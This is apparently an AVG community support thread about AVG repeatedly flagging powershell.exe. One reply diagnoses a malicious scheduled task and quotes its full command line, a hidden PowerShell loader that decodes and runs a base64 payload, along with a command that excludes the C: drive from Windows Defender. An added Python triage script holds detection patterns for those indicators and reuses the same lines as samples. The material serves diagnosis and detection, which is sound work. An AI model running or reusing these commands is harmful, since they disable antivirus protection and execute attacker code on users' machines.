Since I got my AVG free about 5 months ago it keeps detecting 'powershell.exe' as a threat even though I have said that it was safe by putting it into 'exceptions'. I want to know how I can fix this because it's very irritating!
(For some reason I cannot use my screenshot that I took of the problem but it looks the exact same as everyone else's powershell problem)
There was a task created in Task Scheduler that is starting PowerShell.exe, passing some parameters to it. These parameters are base64 encoded.
In my case it was:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}
The payload from system-logs.txt is using SyncAppvPublishingServer.vbs to connect online to a malware server and download a script for executing in PowerShell. This way PowerShell thinks that the downloaded script is signed by Microsoft and it starts to run.
After that, PowerShell will get rid of Windows Defender and will do whatever it wants to:
powershell -Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:'
AVG did a good job by now, removing system-logs.txt, setup.exe and OneDrive.exe .
All I had to do to get rid of that pop-up from AVG was to delete the scheduled task from Task Scheduler:
Microsoft > Windows > NetService > Network.
Delete everything in there, NetService folder too!
I have used Procmon64.exe to detect all of this, and I have not slept all night, so… sorry if I made some mistakes in this comment.
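Added example, not part of the post above or of AVG's reply: a small triage script that scores process command lines (for instance from scheduled-task definitions or process-creation logs) against the indicators visible in the post: a hidden PowerShell window, base64 decoding into a dynamically created script block, the Sync-AppvPublishingServer module being pulled in, the PSModulePath override, and a Defender exclusion being added. The indicator names, weights and threshold are my own assumptions; the sample command lines are constructed from the ones quoted in the post plus two benign lines for contrast.

```python
import re
from typing import Dict, List

# Weighted indicators taken from the scheduled-task command line and the
# Defender-exclusion command quoted in the post. A single weak indicator
# (base64 decoding on its own) is common in legitimate scripts; several
# together, or a Defender exclusion being added, is what merits a look.
# Weights and threshold are assumptions chosen for this example.
INDICATORS = {
    "hidden_window":       (1, re.compile(r"-WindowStyle\s+Hidden", re.I)),
    "base64_decode":       (1, re.compile(r"FromBase64String", re.I)),
    "dynamic_scriptblock": (1, re.compile(r"\[Scriptblock\]::Create|Invoke-Command|Invoke-Expression|\biex\b", re.I)),
    "appv_publishing":     (2, re.compile(r"Sync-?AppvPublishingServer", re.I)),
    "modulepath_override": (1, re.compile(r"\$env:psmodulepath\s*=", re.I)),
    "defender_exclusion":  (3, re.compile(r"Set-MpPreference\s+-ExclusionPath", re.I)),
}
THRESHOLD = 2


def score_command_line(cmdline: str) -> Dict[str, object]:
    """Return the matched indicator names, a weighted score and a verdict for one command line."""
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(cmdline)]
    score = sum(INDICATORS[name][0] for name in hits)
    return {"hits": hits, "score": score, "suspicious": score >= THRESHOLD}


def triage(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Score every command line and return only the suspicious ones, highest score first."""
    scored = [dict(cmdline=c, **score_command_line(c)) for c in cmdlines]
    flagged = [s for s in scored if s["suspicious"]]
    return sorted(flagged, key=lambda s: s["score"], reverse=True)


# Constructed sample input: the task command line and the Defender-exclusion
# command from the post, plus two benign PowerShell invocations.
PAGE_TASK_COMMAND = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}'''
SAMPLE_COMMAND_LINES = [
    PAGE_TASK_COMMAND,
    "powershell -Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:'",
    "powershell.exe -Command Get-Date",
    r"powershell.exe -File C:\Scripts\backup.ps1 -Verbose",
]

if __name__ == "__main__":
    for entry in triage(SAMPLE_COMMAND_LINES):
        print(entry["score"], entry["hits"], entry["cmdline"][:80])
```

Running it flags only the two lines taken from the post (scores 6 and 3); the two benign lines score 0. Feed it the `Actions` field of exported scheduled tasks or the command-line field of process-creation events to find similar tasks elsewhere.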
Hello,
Thank you for sharing the screenshot with us. Could you please confirm whether you have updated the virus database and the AVG program? If not, please refer to the article below to update it:
Updating Virus definitions and AVG AntiVirus application version
Please try the above steps and let us know whether you still get the error. We look forward to your response.
Here's the requested image. Also, I am currently on Windows 10.
Hello Stefan,
Thank you for writing back to us. We request you to create a separate AVG community post by clicking the link below and post your questions in your own post, so that we will check with your AVG account and help you with additional support.
https://support.avg.com/support_ask
Thank you.
Hello Taylor,
We are sorry for the inconvenience caused. We will check and help you to resolve it. Could you please share the screenshot of the AVG detection with us?
Also, please confirm the device's operating system so we can resolve the issue.
You can post the screenshot here in your topic. Click on Answer & then click on the Image [mountain symbol] & follow the instructions. Thanks in advance.